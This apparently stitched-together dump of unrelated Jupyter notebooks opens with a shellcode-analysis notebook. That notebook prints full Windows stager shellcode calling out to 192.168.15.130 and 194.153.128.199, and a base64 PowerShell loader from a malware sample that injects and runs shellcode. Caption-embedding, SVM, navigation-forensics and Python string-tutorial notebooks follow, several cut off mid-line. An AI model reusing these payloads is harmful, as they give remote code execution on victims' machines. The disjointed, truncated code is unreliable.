,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x69,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x35,0x2e,0x31,0x33,0x30,0x00'
output = disassemble_shellcode (sh4)
output
extract_strings(sh4)
extract_annotations_from_output(output)
# ## Example 5
sh5 = '0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x9b,0xad,0x00,0x00,0xe8,0x9c,0x00,0x00,0x00,0x2f,0x6d,0x63,0x67,0x73,0x47,0x53,0x66,0x4c,0x34,0x6a,0x49,0x47,0x38,0x51,0x66,0x77,0x57,0x70,0x64,0x6e,0x74,0x77,0x76,0x31,0x4d,0x6d,0x52,0x44,0x57,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x02,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x34,0x2e,0x31,0x35,0x33,0x2e,0x31,0x32,0x38,0x2e,0x31,0x39,0x39,0x00'
output = disassemble_shellcode (sh5)
output
extract_annotations_from_output(output)
# ## Example 6
sh6 = search_for_hex_shellcode(search_for_b64_string('JABGAFQAQQB0ACAAPQAgACcAJABUAEgAUABKACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQASABQAEoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAYQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBlACwAMAB4ADcAZgAsADAAeABhADAALAAwAHgAYQAxACwAMAB4ADcAMgAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAA4AGEALAAwAHgANQBjACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANwA0ACwAMAB4ADkAZAAsADAAeAA4AGEALAAwAHgAOQA1ACwAMAB4AGYAZAAsADAAeAA3ADgALAAwAHgAYgBiACwAMAB4ADkANQAsADAAeAA5ADkALAAwAHgAMAA5ACwAMAB4AGUAYwAsADAAeAAyADUALAAwAHgAZQBhACwAMAB4ADUAYwAsADAAeAAwADEALAAwAHgAYwBkACwAMAB4AGIAZQAsADAAeAA3ADQALAAwAHgAOQAyACwAMAB4AGEAMwAsADAAeAAxADYALAAwAHgANwBhACwAMAB4ADEAMwAsADAAeAAwADkALAAwAHgANAAwACwAMAB4AGIANQAsADAAeABhADQALAAwAHgAMgAyACwAMAB4AGIAMAAsADAAeABkADQALAAwAHgAMgA2ACwAMAB4ADMAOQAsADAAeABlADQALAAwAHgAMwA2ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgAZgA5ACwAMAB4ADMANwAsADAAeAA1AGYALAAwAHgAZQBmACwAMAB4AGYAMwAsADAAeAA2AGEALAAwAHgAMAA4ACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOQBhACwAMAB4ADMAZAAsADAAeAAzADEALAAwAHgANwA5ACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgAZAA3ACwAMAB4AGYAOQAsADAAeABjADUALAAwAHgAYwA2ACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgANQA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZQBhACwAMAB4ADUAYQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAMwAsADAAeAA0ADQALAAwAHgAZAA2ACwAMAB4ADgANAAsADAAeAA3AGEALAAwAHgAZgBlACwAMAB4ADIAYwAsADAAeAA3ADIALAAwAHgANwBkACwAMAB4AGQANgAsADAAeAA3AGMALAAwAHgANwBiACwAMAB4AGQAMQAsADAAeAAxADcALAAwAHgAYgAxACwAMAB4ADgAZQAsADAAeAAyADgALAAwAHgANQBmACwAMAB4ADcANgAsADAAeAA3ADEALAAwAHgANQBmACwAMAB4AGEAOQAsADAAeAA4ADQALAAwAHgAMABjACwAMAB4ADYANwAsADAAeAA2AGUALAAwAHgAZgA2ACwAMAB4AGMAYQAsADAAeABlADIALAAwAHgANwA1ACwAMAB4ADUAMAAsADAAeAA5ADgALAAwAHgANQA0ACwAMAB4ADUAMgAsADAAeAA2ADAALAAwAHgANABkACwAMAB4ADAAMgAsADAAeAAxADEALAAwAHgANgBlACwAMAB4ADMAYQAsADAAeAA0ADEALAAwAHgANwBkACwAMAB4ADcAMwAsADAAeABiAGQALAAwAHgAOAA2ACwAMAB4AGYANQAsADAAeAA4AGYALAAwAHgAMwA2ACwAMAB4ADIAOQAsADAAeABkAGEALAAwAHgAMQA5ACwAMAB4ADAAYwAsADAAeAAwAGQALAAwAHgAZgBlACwAMAB4ADQAMgAsADAAeABkADYALAAwAHgAMgBjACwAMAB4AGEANwAsADAAeAAyAGUALAAwAHgAYgA5ACwAMAB4ADUAMQAsADAAeABiADcALAAwAHgAOQAwACwAMAB4ADYANgAsADAAeABmADcALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAA3ADIALAAwAHgAOABhACwAMAB4ADkAOQAsADAAeAAyADkALAAwAHgAYgA3ACwAMAB4AGEANgAsADAAeAAyADEALAAwAHgAYQBhACwAMAB4AGQAZgAsADAAeABiADEALAAwAHgANQAyACwAMAB4ADkAOAAsADAAeAA0ADAALAAwAHgANgA5ACwAMAB4AGYAZAAsADAAeAA5ADAALAAwAHgAMAA5ACwAMAB4AGIANwAsADAAeABmAGEALAAwAHgAYQAxACwAMAB4ADEAZQAsADAAeAA0ADgALAAwAHgAZAA0ACwAMAB4ADAAYQAsADAAeAA0AGUALAAwAHgAYgA3ACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAA2ACwAMAB4ADcAMwAsADAAeAA4ADEALAAwAHgAMwBhACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgAYQBhACwAMAB4AGQAMAAsADAAeAAwADAALAAwAHgANQBiACwAMAB4ADcAZgAsADAAeAA0AGMALAAwAHgAMABiACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAOQAxACwAMAB4ADAAOQAsADAAeAAwADQALAAwAHgAZQAzACwAMAB4ADkAMwAsADAAeAAwAGQALAAwAHgAMABiACwAMAB4AGEAZgAsADAAeAAxAGEALAAwAHgAZQBiACwAMAB4ADcAYgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGEANAAsADAAeAAzAGIALAAwAHgAYwBmACwAMAB4ADIAZAAsADAAeAAxADQALAAwAHgAZAAzACwAMAB4ADAANQAsADAAeABhADIALAAwAHgANABiACwAMAB4AGMAMwAsADAAeAAyADUALAAwAHgANgA4ACwAMAB4AGUANAAsADAAeAA2ADkALAAwAHgAYwBhACwAMAB4AGMANQAsADAAeAA1AGMALAAwAHgAMAA1ACwAMAB4ADcAMwAsADAAeAA0AGMALAAwAHgAMQA2ACwAMAB4AGIANAAsADAAeAA3AGMALAAwAHgANQBhACwAMAB4ADUAMgAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADYAOQAsADAAeABhADIALAAwAHgAYgA4ACwAMAB4AGYAZgAsADAAeAAwADQALAAwAHgAYgAwACwAMAB4ADIAYwAsADAAeABmADAALAAwAHgANQAyACwAMAB4AGUAYQAsADAAeABmAGEALAAwAHgAMABmACwAMAB4ADQAOQAsADAAeAA4ADEALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeAA3ADYALAAwAHgAMAAwACwAMAB4ADUANQAsADAAeAAzADIALAAwAHgANwA1ACwAMAB4ADcANQAsADAAeAA5ADEALAAwAHgAOQBkACwAMAB4ADgANgAsADAAeAA1ADAALAAwAHgAYQBhACwAMAB4ADEANAAsADAAeAAxADMALAAwAHgAMQBiACwAMAB4AGMANAAsADAAeAA1ADgALAAwAHgAZgAzACwAMAB4ADkAYgAsADAAeAAxADQALAAwAHgAMABmACwAMAB4ADkAOQAsADAAeAA5AGIALAAwAHgANwBjACwAMAB4AGYANwAsADAAeABmADkALAAwAHgAYwBmACwAMAB4ADkAOQAsADAAeABmADgALAAwAHgAZAA3ACwAMAB4ADYAMwAsADAAeAAzADIALAAwAHgANgBkACwAMAB4AGQAOAAsADAAeABkADUALAAwAHgAZQA3ACwAMAB4ADIANgAsADAAeABiADAALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAwADEALAAwAHgAMQBmACwAMAB4ADIAMwAsADAAeAAzADUALAAwAHgAOQAwACwAMAB4ADYAMwAsADAAeABmADIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAA4AGQALAAwAHgAYwA2ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABXAHcAUQBwAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABXAHcAUQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABXAHcAUQBwACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQARgBUAEEAdAApACkAOwAkAG4ASwBBACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFUAUwBaACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFUAUwBaACAAJABuAEsAQQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABuAEsAQQAgACQAZQAiADsAfQA='))
output = disassemble_shellcode (sh6)
output
extract_annotations_from_output(output)
# ## Example 7
# +
sh7 = '+fc,+e8,+82,+00,+00,+00,+60,+89,+e5,+31,+c0,+64,+8b,+50,+30,+8b,+52,+0c,+8b,+52,+14,+8b,+72,+28,+0f,+b7,+4a,+26,+31,+ff,+ac,+3c,+61,+7c,+02,+2c,+20,+c1,+cf,+0d,+01,+c7,+e2,+f2,+52,+57,+8b,+52,+10,+8b,+4a,+3c,+8b,+4c,+11,+78,+e3,+48,+01,+d1,+51,+8b,+59,+20,+01,+d3,+8b,+49,+18,+e3,+3a,+49,+8b,+34,+8b,+01,+d6,+31,+ff,+ac,+c1,+cf,+0d,+01,+c7,+38,+e0,+75,+f6,+03,+7d,+f8,+3b,+7d,+24,+75,+e4,+58,+8b,+58,+24,+01,+d3,+66,+8b,+0c,+4b,+8b,+58,+1c,+01,+d3,+8b,+04,+8b,+01,+d0,+89,+44,+24,+24,+5b,+5b,+61,+59,+5a,+51,+ff,+e0,+5f,+5f,+5a,+8b,+12,+eb,+8d,+5d,+68,+33,+32,+00,+00,+68,+77,+73,+32,+5f,+54,+68,+4c,+77,+26,+07,+89,+e8,+ff,+d0,+b8,+90,+01,+00,+00,+29,+c4,+54,+50,+68,+29,+80,+6b,+00,+ff,+d5,+6a,+0a,+68,+34,+0f,+c2,+1c,+68,+02,+00,+63,+07,+89,+e6,+50,+50,+50,+50,+40,+50,+40,+50,+68,+ea,+0f,+df,+e0,+ff,+d5,+97,+6a,+10,+56,+57,+68,+99,+a5,+74,+61,+ff,+d5,+85,+c0,+74,+0c,+ff,+4e,+08,+75,+ec,+68,+f0,+b5,+a2,+56,+ff,+d5,+6a,+00,+6a,+04,+56,+57,+68,+02,+d9,+c8,+5f,+ff,+d5,+8b,+36,+6a,+40,+68,+00,+10,+00,+00,+56,+6a,+00,+68,+58,+a4,+53,+e5,+ff,+d5,+93,+53,+6a,+00,+56,+53,+57,+68,+02,+d9,+c8,+5f,+ff,+d5,+01,+c3,+29,+c6,+75,+ee,+c3'.replace('+','0x')
## from sample c5b1b5fddd82f205f873bcc1f61f77b4ef9759bc6402cba2a33b3dcf18971f2f
output = disassemble_shellcode (sh7)
output
# -
extract_annotations_from_output(output)
# ## References
#
# * (https://pentest.blog/art-of-anti-detection-3-shellcode-alchemy/) by https://twitter.com/egeblc
# * (http://www.lsd-pl.net/winasm-slides.pdf) by LSD
# * (https://cansecwest.com/core05/core05_metasploit.pdf) by @hdmoore and spoonm
# * (https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-chong.pdf)
| 32,774 |
/model_training/word_embedding.ipynb
|
8bdb50f3007938ad639025cec102470e3297d7ae
|
[] |
no_license
|
alexding123/Pinar
|
https://github.com/alexding123/Pinar
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,933 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import json
import gensim
from gensim.models.keyedvectors import KeyedVectors
import pickle
from collections import Counter
from collections import defaultdict
glove = KeyedVectors.load_word2vec_format("../tests/glove.6B.50d.txt.w2v", binary=False)
# +
with open("../tests/captions_train2014.json") as f:
d = json.load(f)
images = d["images"]
captions = d["annotations"]
# +
import re, string
punc_regex = re.compile('[{}]'.format(re.escape(string.punctuation)))
def strip_punc(corpus):
return punc_regex.sub('', corpus)
# +
def to_counter(doc):
return Counter(strip_punc(doc).lower().split())
# -
def to_bag(counters, k=None, stop_words=None):
bag = Counter()
for counter in counters:
bag.update(counter)
if stop_words is not None:
for word in set(stop_words):
bag.pop(word, None) # if word not in bag, return None
return sorted(i for i,j in bag.most_common(k))
# +
def to_idf(bag, caption_embeddings):
idf = defaultdict(int)
for i in caption_embeddings:
for w in strip_punc(caption_embeddings[i]["caption"]).lower().split():
idf[w] += 1
for w in idf:
idf[w] = np.log10(len(caption_embeddings) / idf[w])
return idf
# -
with open("../tests/stopwords.txt", 'r') as r:
stops = []
for line in r:
stops += [i.strip() for i in line.split('\t')]
# +
caption_embeddings = {}
for caption in captions:
caption_embeddings[caption["id"]] = {"caption":caption["caption"], "image_id":caption["image_id"]}
# -
counters = []
for i in caption_embeddings.keys():
counters.append(to_counter(caption_embeddings[i]["caption"]))
bag = to_bag(counters,stop_words=stops)
idf = to_idf(bag,caption_embeddings)
# +
for i in caption_embeddings.keys():
total = 0
x = 0
for w in strip_punc(caption_embeddings[i]["caption"]).lower().split():
if idf[w] == 0 or w not in glove:
continue
x += glove[w] * idf[w]
total += 1
caption_embeddings[i]["embedding"] = x / total
# -
with open("idf_and_caption_embeddings.pkl",mode='wb') as f:
pickle.dump((idf,caption_embeddings),f)
ain[i]))
x_y=x_y[~np.all(x_y == 0, axis=1)]
xtrain_balance=x_y[:,0:4654]
ytrain_balance=x_y[:,4654:]
return xtrain_balance,ytrain_balance
xtrain_balance,ytrain_balance=balance_data (xtrain,ytrain)
# ### Kernel PCA
def stepwise_kpca(X, gamma=0.0001, n_components=123):
sq_dists = pdist(X, 'sqeuclidean')
mat_sq_dists = squareform(sq_dists)
K = exp(-gamma * mat_sq_dists)
N = K.shape[0]
one_n = np.ones((N,N)) / N
eigvals, eigvecs = eigh(K)
X_pc = np.column_stack((eigvecs[:,-i] for i in range(1,n_components+1)))
return X_pc
# ### Features Selection
# ### Cross Validation Single SVM
def cross_validation_SVM (xtrain,ytrain,number_exp=5):
acc=[]
score=[]
under_curve=[]
for j in range (number_exp):
rand_nu=np.random.randint(0,100)
X_train, X_test, y_train, y_test = train_test_split(xtrain, ytrain, test_size=0.2, random_state=rand_nu)
clf = svm.SVC(gamma='scale', decision_function_shape='ovo',probability=True)
clf.fit(X_train, y_train.reshape(-1,))
acc.append(clf.score(X_test,y_test)*100)
prob=clf.decision_function(X_test)
ror= metrics.roc_auc_score(y_test,prob)
under_curve.append(ror)
print('total accuercy form {} experiments = {:.2f} % std= {:.2f}'.format(number_exp,np.mean(acc),np.std(acc)))
print('the total area under the curve = {:.2f} std= {:.2f}'.format(np.mean(under_curve),np.std(under_curve)))
return np.mean(under_curve)
# ### Cross Validation voting from 3 SVMs
def cross_validation_multi_SVM (xtrain,ytrain,number_exp=5, number_GP=3):
acc=[]
score=[]
under_curve=[]
for j in range (number_exp):
rand_nu=np.random.randint(0,100)
X_train, X_test, y_train, y_test = train_test_split(xtrain, ytrain, test_size=0.2, random_state=rand_nu)
# for g in range (number_GP):
clf1 = svm.SVC(gamma='scale', decision_function_shape='ovo',probability=True)
clf1.fit(X_train, y_train.reshape(-1,))
clf2 = svm.SVC(gamma='scale', decision_function_shape='ovo',probability=True)
clf2.fit(X_train, y_train.reshape(-1,))
clf3 = svm.SVC(gamma='scale', decision_function_shape='ovo',probability=True)
clf3.fit(X_train, y_train.reshape(-1,))
vote=VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='soft')
vote.fit(X_train, y_train.reshape(-1,))
acc.append(vote.score(X_test,y_test)*100)
# prob=vote.predict(X_test)
prob=vote.predict_proba(X_test)
ror= metrics.roc_auc_score(y_test,prob[:,1])
under_curve.append(ror)
print('total accuercy form {} experiments = {:.2f} % std= {:.2f}'.format(number_exp,np.mean(acc),np.std(acc)))
print('the total area under the curve = {:.2f} std= {:.2f}'.format(np.mean(under_curve),np.std(under_curve)))
return np.mean(under_curve)
# ### Test
# ## Xtrain, ytrain
print('Single SVM')
cross_validation_SVM(xtrain,ytrain)
print('Multi SVMs')
cross_validation_multi_SVM(xtrain,ytrain)
# ### PCA
X_pc_unbalance= stepwise_kpca(xtrain,gamma=0.00001,n_components=99)
print('Single SVM')
cross_validation_SVM(X_pc_unbalance,ytrain)
print('Multi SVMs')
cross_validation_multi_SVM(X_pc_unbalance,ytrain)
| 5,764 |
/.ipynb_checkpoints/Gini_Lastbin-checkpoint.ipynb
|
788102f614fe8804833748b1416cd56ac032acd9
|
[] |
no_license
|
lky9620/Car_Forensics
|
https://github.com/lky9620/Car_Forensics
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 9,035 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import struct
import folium
def GiniLastbin(data):
X_Line = data[0:4]
Y_Line = data[4:8]
X_Line = struct.unpack('<HH',X_Line)
X_Line = (X_Line[1]<<16)+X_Line[0]
Y_Line = struct.unpack('<HH',Y_Line)
Y_Line = (Y_Line[1]<<16)+Y_Line[0]
X_Line += 81284000
Y_Line += 23820000
return Y_Line,X_Line ## (위도, 경도)
Last_Data = open('C:/Users/LEEKEONYONG/Desktop/navigation_backup/UserData/Rec/Last.bin', 'rb')
data = Last_Data.read()
Last_Data.close()
GiniLastbin(data)
m = folium.Map([GiniLastbin(data)[0]/10**6,GiniLastbin(data)[1]/10**6], zoom_start = 15)
folium.Marker([GiniLastbin(data)[0]/10**6,GiniLastbin(data)[1]/10**6],tooltip = 'Last.bin에 저장된 장소').add_to(m)
m
| 991 |
/01Python/.ipynb_checkpoints/runoob07 Python3 字符串-checkpoint.ipynb
|
801042867519a241aacbfc4c1b51fb51a260b6a7
|
[] |
no_license
|
HBU/Jupyter
|
https://github.com/HBU/Jupyter
| 3 | 3 | null | 2022-07-06T19:20:58 | 2022-06-29T07:28:04 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 7,314 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # string
# +
# Python 访问字符串中的值
var1 = 'Hello World!'
var2 = "Runoob"
print ("var1[0]: ", var1[0])
print ("var2[1:5]: ", var2[1:5])
# +
# Python字符串更新
var1 = 'Hello World!'
print ("已更新字符串 : ", var1[:6] + 'Runoob!')
# -
print ('\a','\\')
# +
a = "Hello"
b = "Python"
print("a + b 输出结果:", a + b)
print("a * 2 输出结果:", a * 2)
print("a[1] 输出结果:", a[1])
print("a[1:4] 输出结果:", a[1:4])
if( "H" in a) :
print("H 在变量 a 中")
else :
print("H 不在变量 a 中")
if( "M" not in a) :
print("M 不在变量 a 中")
else :
print("M 在变量 a 中")
print (r'\n')
print (R'\n')
# -
# 在需要在字符中使用特殊字符时,python用反斜杠(\\)转义字符。
# +
#Python字符串运算符
a = "Hello"
b = "Python"
print("a + b 输出结果:", a + b)
print("a * 2 输出结果:", a * 2)
print("a[1] 输出结果:", a[1])
print("a[1:4] 输出结果:", a[1:4])
if( "H" in a) :
print("H 在变量 a 中")
else :
print("H 不在变量 a 中")
if( "M" not in a) :
print("M 不在变量 a 中")
else :
print("M 在变量 a 中")
print (r'\n')
print (R'\n')
# +
#Python字符串格式化
print ("我叫 %s 今年 %d 岁!" % ('小明', 10))
# -
para_str = """这是一个多行字符串的实例
多行字符串可以使用制表符
TAB ( \t )。
也可以使用换行符 [ \n ]。
"""
print (para_str)
# ##### 三引号让程序员从引号和特殊字符串的泥潭里面解脱出来,自始至终保持一小块字符串的格式是所谓的WYSIWYG(所见即所得)格式的。
#
# 一个典型的用例是,当你需要一块HTML或者SQL时,这时用字符串组合,特殊字符串转义将会非常的繁琐。
errHTML = '''
<HTML><HEAD><TITLE>
Friends CGI Demo</TITLE></HEAD>
<BODY><H3>ERROR</H3>
<B>%s</B><P>
<FORM><INPUT TYPE=button VALUE=Back
ONCLICK="window.history.back()"></FORM>
</BODY></HTML>
'''
errHTML
import pymssql
# pip install pymssql-2.1.3-cp36-cp36m-win_amd64.whl
print ("start:")
conn = pymssql.connect(host='.',user='sa',password='sql',database='Test', charset="GBK")
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE users (
login VARCHAR(8),
uid INTEGER,
prid INTEGER)
''')
# +
# 0、a,b为参数。从字符串指针为a的地方开始截取字符,到b的前一个位置(因为不包含b)
var1 = "hello world";
#print(var1[a: b]);
# 1、如果a,b均不填写,默认取全部字符。即,下面这两个打印结果是一样的
print(var1[: ]); # hello world
print(var1); # hello world
# 2、如果a填写,b不填写(或填写的值大于指针下标),默认从a开始截取,至字符串最后一个位置
print(var1[3: ]); # lo world
# 3、如果a不填写, b填写,默认从0位置开始截取,至b的前一个位置
print(var1[: 8]); # hello wo
# 4、如果a为负数,默认从尾部某一位置,开始向left截取
print(var1[-2: ]); # ld
# 5、如果a>=b, 默认输出为空。
print(var1[3: 3]);
print(var1[3: 2]);
# -
L=['a','b','c','d','e','f','g']
print(L[::2])
# End of String
net', input_tensor=None, input_shape=None, pooling=None, classes=1000)
# Arguments
# blocks: numbers of building blocks for the four dense layers.
# include_top: whether to include the fully-connected layer at the top of the network.
# weights: one of None (random initialization), 'imagenet' (pre-training on ImageNet), or the path to the weights file to be loaded.
# input_tensor: optional Keras tensor (i.e. output of layers.Input()) to use as image input for the model.
# input_shape: optional shape tuple, only to be specified if include_top is False (otherwise the input shape has to be (224, 224, 3) (with 'channels_last' data format) or (3, 224, 224) (with 'channels_first' data format). It should have exactly 3 inputs channels, and width and height should be no smaller than 32. E.g. (200, 200, 3) would be one valid value.
